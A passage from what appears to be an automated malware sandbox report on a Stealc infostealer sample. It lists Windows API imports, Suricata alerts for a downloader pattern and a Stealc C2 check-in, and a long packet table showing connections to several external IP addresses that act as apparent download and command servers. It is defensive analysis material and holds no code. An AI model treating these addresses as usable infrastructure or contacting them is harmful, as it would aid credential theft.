GetFileSize, SetLocaleInfoA, WriteConsoleOutputCharacterW, GetStringTypeA, UpdateResourceA, InterlockedIncrement, GetConsoleAliasA, InterlockedDecrement, SetDefaultCommConfigW, Process32First, CancelWaitableTimer, SetComputerNameW, GetTimeFormatA, SetEvent, GetModuleHandleW, GetCommandLineA, SetProcessPriorityBoost, GetEnvironmentStrings, GlobalAlloc, LoadLibraryW, GetConsoleAliasExesLengthW, WriteConsoleOutputA, GetFileAttributesW, GetModuleFileNameW, GetVolumePathNameA, SetLastError, GetProcAddress, SetFileAttributesA, GetAtomNameA, LoadLibraryA, RegisterWaitForSingleObject, AddAtomW, GetModuleFileNameA, BuildCommDCBA, GetVersionExA, OpenFileMappingA, WriteProcessMemory, GetLastError, HeapFree, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapAlloc, VirtualAlloc, HeapReAlloc, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, Sleep, HeapSize, ExitProcess, WriteFile, GetStdHandle, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, GetLocaleInfoA, MultiByteToWideChar, GetStringTypeW, LCMapStringA, LCMapStringW, GetModuleHandleA

USER32.dll

GetClassLongW, GetMonitorInfoW

Possible Origin

Language of compilation system	Country where language is spoken	Map
Syriac	Syriac

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-10T15:12:16.295065+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49705	104.21.56.70	443	TCP
2024-12-10T15:12:17.937923+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49706	176.113.115.19	80	TCP
2024-12-10T15:12:24.508643+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.8	49707	92.255.57.89	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 15:12:13.879342079 CET	49705	443	192.168.2.8	104.21.56.70
Dec 10, 2024 15:12:13.879395008 CET	443	49705	104.21.56.70	192.168.2.8
Dec 10, 2024 15:12:13.879529953 CET	49705	443	192.168.2.8	104.21.56.70
Dec 10, 2024 15:12:13.891623974 CET	49705	443	192.168.2.8	104.21.56.70
Dec 10, 2024 15:12:13.891644001 CET	443	49705	104.21.56.70	192.168.2.8
Dec 10, 2024 15:12:15.115421057 CET	443	49705	104.21.56.70	192.168.2.8
Dec 10, 2024 15:12:15.115526915 CET	49705	443	192.168.2.8	104.21.56.70
Dec 10, 2024 15:12:15.743515968 CET	49705	443	192.168.2.8	104.21.56.70
Dec 10, 2024 15:12:15.743529081 CET	443	49705	104.21.56.70	192.168.2.8
Dec 10, 2024 15:12:15.743871927 CET	443	49705	104.21.56.70	192.168.2.8
Dec 10, 2024 15:12:15.743931055 CET	49705	443	192.168.2.8	104.21.56.70
Dec 10, 2024 15:12:15.747087002 CET	49705	443	192.168.2.8	104.21.56.70
Dec 10, 2024 15:12:15.791323900 CET	443	49705	104.21.56.70	192.168.2.8
Dec 10, 2024 15:12:16.295094013 CET	443	49705	104.21.56.70	192.168.2.8
Dec 10, 2024 15:12:16.295211077 CET	443	49705	104.21.56.70	192.168.2.8
Dec 10, 2024 15:12:16.295223951 CET	49705	443	192.168.2.8	104.21.56.70
Dec 10, 2024 15:12:16.295260906 CET	49705	443	192.168.2.8	104.21.56.70
Dec 10, 2024 15:12:16.307225943 CET	49705	443	192.168.2.8	104.21.56.70
Dec 10, 2024 15:12:16.307246923 CET	443	49705	104.21.56.70	192.168.2.8
Dec 10, 2024 15:12:16.486450911 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:16.605739117 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:16.605891943 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:16.606120110 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:16.725327969 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:17.937845945 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:17.937905073 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:17.937917948 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:17.937922955 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:17.937966108 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:17.937966108 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:17.938138008 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:17.938150883 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:17.938177109 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:17.938194036 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:17.938285112 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:17.938297033 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:17.938317060 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:17.938323021 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:17.938329935 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:17.938339949 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:17.938369989 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:17.938370943 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:17.938534975 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:17.938571930 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.057334900 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.057349920 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.057454109 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.061356068 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.061439037 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.129946947 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.130007029 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.130037069 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.130080938 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.134031057 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.134078026 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.134136915 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.134171963 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.142427921 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.142473936 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.145768881 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.145816088 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.145870924 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.153808117 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.153934002 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.153992891 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.162172079 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.162297010 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.162354946 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.170520067 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.170689106 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.170746088 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.178895950 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.178949118 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.179007053 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.187251091 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.187362909 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.187428951 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.195588112 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.195746899 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.195808887 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.203176022 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.203275919 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.203335047 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.210808039 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.210905075 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.210961103 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.249538898 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.253396034 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.321981907 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.322078943 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.322170019 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.324399948 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.324454069 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.324472904 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.324515104 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.329231977 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.329287052 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.329361916 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.334188938 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.334290028 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.334351063 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.338821888 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.338912010 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.338959932 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.343597889 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.343661070 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.343703985 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.348282099 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.348335028 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.348381042 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.352674007 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.352756977 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.352807045 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.357222080 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.357346058 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.357409954 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.361835957 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.361921072 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.361979961 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.366301060 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.366368055 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.366367102 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.366400003 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.370903969 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.370917082 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.370969057 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.376243114 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.376300097 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.376355886 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.379944086 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.380058050 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.380117893 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.384479046 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.384560108 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.384620905 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.388263941 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.388334990 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.388392925 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.392178059 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.392272949 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.392350912 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.395752907 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.395881891 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.395941973 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.399490118 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.399540901 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.399599075 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.399641037 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.403652906 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.403956890 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.404004097 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.407161951 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.407174110 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.407259941 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.407259941 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.410743952 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.410957098 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.411010027 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.441592932 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.441648006 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.441752911 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.441798925 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.443474054 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.443519115 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.443536997 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.443584919 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.515036106 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.515091896 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.515146017 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.515238047 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.515907049 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.515919924 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.515955925 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.518557072 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.518608093 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.518699884 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.518745899 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.521431923 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.521477938 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.521541119 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.521583080 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.524343014 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.524405956 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.524461031 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.527179956 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.527225971 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.527262926 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.527318001 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.530056953 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.530070066 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.530117989 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.532553911 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.532601118 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.532672882 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.532718897 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.535279036 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.535327911 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.535383940 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.535454035 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.537992001 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.538064003 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.538079023 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.538121939 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.540409088 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.540458918 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.540513039 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.540565014 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.542956114 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.543009043 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.543056011 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.543096066 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.545603037 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.545663118 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.545691967 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.545882940 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.548111916 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.548166037 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.548197031 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.548249960 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.550704956 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.550764084 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.550791025 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.550874949 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.553343058 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.553394079 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.553399086 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.553428888 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.555872917 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.555907965 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.555923939 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.555949926 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.558401108 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.558454037 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.558475018 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.558510065 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.561538935 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.561553001 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.561594963 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.563543081 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.563596010 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.563606977 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.563822985 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.566081047 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.566137075 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.566148996 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.566193104 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.568645000 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.568763971 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.568772078 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.568799019 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.570535898 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.570564032 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.570610046 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.572375059 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.572422981 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.572465897 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.572513103 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.574170113 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.574215889 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.574287891 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.574345112 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.576040983 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.576086998 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.576236963 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.576338053 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.577893019 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.577938080 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.577940941 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.577979088 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.579996109 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.580040932 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.580044031 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.580084085 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.581581116 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.581660986 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.581686974 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.581708908 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.583592892 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.583638906 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.583673000 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.583712101 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.585375071 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.585433006 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.585473061 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.585519075 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.587141037 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.587188959 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.587199926 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.587233067 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.588979006 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.589026928 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.589152098 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.589195013 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.591061115 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.591098070 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.591285944 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.591339111 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.592691898 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.592761993 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.592921019 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.592921019 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.594505072 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.594566107 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.594599009 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.594638109 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.596493006 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.596594095 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.596626043 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.596671104 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.598200083 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.598253965 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.598303080 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.598345995 CET	49706	80	192.168.2.8	176.113.115.19
